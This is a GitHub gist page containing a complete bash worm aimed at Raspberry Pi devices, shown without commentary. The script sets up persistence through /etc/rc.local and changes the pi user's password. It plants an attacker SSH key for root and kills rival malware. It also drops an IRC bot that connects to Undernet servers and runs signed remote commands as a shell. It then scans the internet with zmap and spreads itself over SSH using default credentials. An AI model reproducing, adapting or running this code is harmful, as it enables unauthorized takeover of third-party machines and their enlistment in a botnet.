Created
June 7, 2019 07:39
-
-
Save vncloudsco/4c375184f3e97d9bba27d13e9e6d5dbe to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| MYSELF=`realpath $0` | |
| DEBUG=/dev/null | |
| echo $MYSELF >> $DEBUG | |
| if [ "$EUID" -ne 0 ] | |
| then | |
| NEWMYSELF=`mktemp -u 'XXXXXXXX'` | |
| sudo cp $MYSELF /opt/$NEWMYSELF | |
| sudo sh -c "echo '#!/bin/sh -e' > /etc/rc.local" | |
| sudo sh -c "echo /opt/$NEWMYSELF >> /etc/rc.local" | |
| sudo sh -c "echo 'exit 0' >> /etc/rc.local" | |
| sleep 1 | |
| sudo reboot | |
| else | |
| TMP1=`mktemp` | |
| echo $TMP1 >> $DEBUG | |
| killall bins.sh | |
| killall minerd | |
| killall node | |
| killall nodejs | |
| killall ktx-armv4l | |
| killall ktx-i586 | |
| killall ktx-m68k | |
| killall ktx-mips | |
| killall ktx-mipsel | |
| killall ktx-powerpc | |
| killall ktx-sh4 | |
| killall ktx-sparc | |
| killall arm5 | |
| killall zmap | |
| killall kaiten | |
| killall perl | |
| echo "127.0.0.1 bins.deutschland-zahlung.eu" >> /etc/hosts | |
| rm -rf /root/.bashrc | |
| rm -rf /home/pi/.bashrc | |
| usermod -p \$6\$vGkGPKUr\$heqvOhUzvbQ66Nb0JGCijh/81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhkHD0MRsAkfJgjU/ioCYDeR1 pi | |
| mkdir -p /root/.ssh | |
| echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B" >> /root/.ssh/authorized_keys | |
| echo "nameserver 8.8.8.8" >> /etc/resolv.conf | |
| rm -rf /tmp/ktx* | |
| rm -rf /tmp/cpuminer-multi | |
| rm -rf /var/tmp/kaiten | |
| cat > /tmp/public.pem <<EOFMARKER | |
| -----BEGIN PUBLIC KEY----- | |
| MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC/ihTe2DLmG9huBi9DsCJ90MJs | |
| glv7y530TWw2UqNtKjPPA1QXvNsWdiLpTzyvk8mv6ObWBF8hHzvyhJGCadl0v3HW | |
| rXneU1DK+7iLRnkI4PRYYbdfwp92nRza00JUR7P4pghG5SnRK+R/579vIiy+1oAF | |
| WRq+Z8HYMvPlgSRA3wIDAQAB | |
| -----END PUBLIC KEY----- | |
| EOFMARKER | |
| BOT=`mktemp -u 'XXXXXXXX'` | |
| cat > /tmp/$BOT <<'EOFMARKER' | |
| #!/bin/bash | |
| SYS=`uname -a | md5sum | awk -F' ' '{print $1}'` | |
| NICK=a${SYS:24} | |
| while [ true ]; do | |
| arr[0]="ix1.undernet.org" | |
| arr[1]="ix2.undernet.org" | |
| arr[2]="Ashburn.Va.Us.UnderNet.org" | |
| arr[3]="Bucharest.RO.EU.Undernet.Org" | |
| arr[4]="Budapest.HU.EU.UnderNet.org" | |
| arr[5]="Chicago.IL.US.Undernet.org" | |
| rand=$[$RANDOM % 6] | |
| svr=${arr[$rand]} | |
| eval 'exec 3<>/dev/tcp/$svr/6667;' | |
| if [[ ! "$?" -eq 0 ]] ; then | |
| continue | |
| fi | |
| echo $NICK | |
| eval 'printf "NICK $NICK\r\n" >&3;' | |
| if [[ ! "$?" -eq 0 ]] ; then | |
| continue | |
| fi | |
| eval 'printf "USER user 8 * :IRC hi\r\n" >&3;' | |
| if [[ ! "$?" -eq 0 ]] ; then | |
| continue | |
| fi | |
| # Main loop | |
| while [ true ]; do | |
| eval "read msg_in <&3;" | |
| if [[ ! "$?" -eq 0 ]] ; then | |
| break | |
| fi | |
| if [[ "$msg_in" =~ "PING" ]] ; then | |
| printf "PONG %s\n" "${msg_in:5}"; | |
| eval 'printf "PONG %s\r\n" "${msg_in:5}" >&3;' | |
| if [[ ! "$?" -eq 0 ]] ; then | |
| break | |
| fi | |
| sleep 1 | |
| eval 'printf "JOIN #biret\r\n" >&3;' | |
| if [[ ! "$?" -eq 0 ]] ; then | |
| break | |
| fi | |
| elif [[ "$msg_in" =~ "PRIVMSG" ]] ; then | |
| privmsg_h=$(echo $msg_in| cut -d':' -f 3) | |
| privmsg_data=$(echo $msg_in| cut -d':' -f 4) | |
| privmsg_nick=$(echo $msg_in| cut -d':' -f 2 | cut -d'!' -f 1) | |
| hash=`echo $privmsg_data | base64 -d -i | md5sum | awk -F' ' '{print $1}'` | |
| sign=`echo $privmsg_h | base64 -d -i | openssl rsautl -verify -inkey /tmp/public.pem -pubin` | |
| if [[ "$sign" == "$hash" ]] ; then | |
| CMD=`echo $privmsg_data | base64 -d -i` | |
| RES=`bash -c "$CMD" | base64 -w 0` | |
| eval 'printf "PRIVMSG $privmsg_nick :$RES\r\n" >&3;' | |
| if [[ ! "$?" -eq 0 ]] ; then | |
| break | |
| fi | |
| fi | |
| fi | |
| done | |
| done | |
| EOFMARKER | |
| chmod +x /tmp/$BOT | |
| nohup /tmp/$BOT 2>&1 > /tmp/bot.log & | |
| rm /tmp/nohup.log -rf | |
| rm -rf nohup.out | |
| sleep 3 | |
| rm -rf /tmp/$BOT | |
| NAME=`mktemp -u 'XXXXXXXX'` | |
| date > /tmp/.s | |
| apt-get update -y --force-yes | |
| apt-get install zmap sshpass -y --force-yes | |
| while [ true ]; do | |
| FILE=`mktemp` | |
| zmap -p 22 -o $FILE -n 100000 | |
| killall ssh scp | |
| for IP in `cat $FILE` | |
| do | |
| sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /opt/.r && sshpass -praspberry ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" & | |
| sshpass -praspberryraspberry993311 scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /opt/.r && sshpass -praspberryraspberry993311 ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" & | |
| done | |
| rm -rf $FILE | |
| sleep 10 | |
| done | |
| fi | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment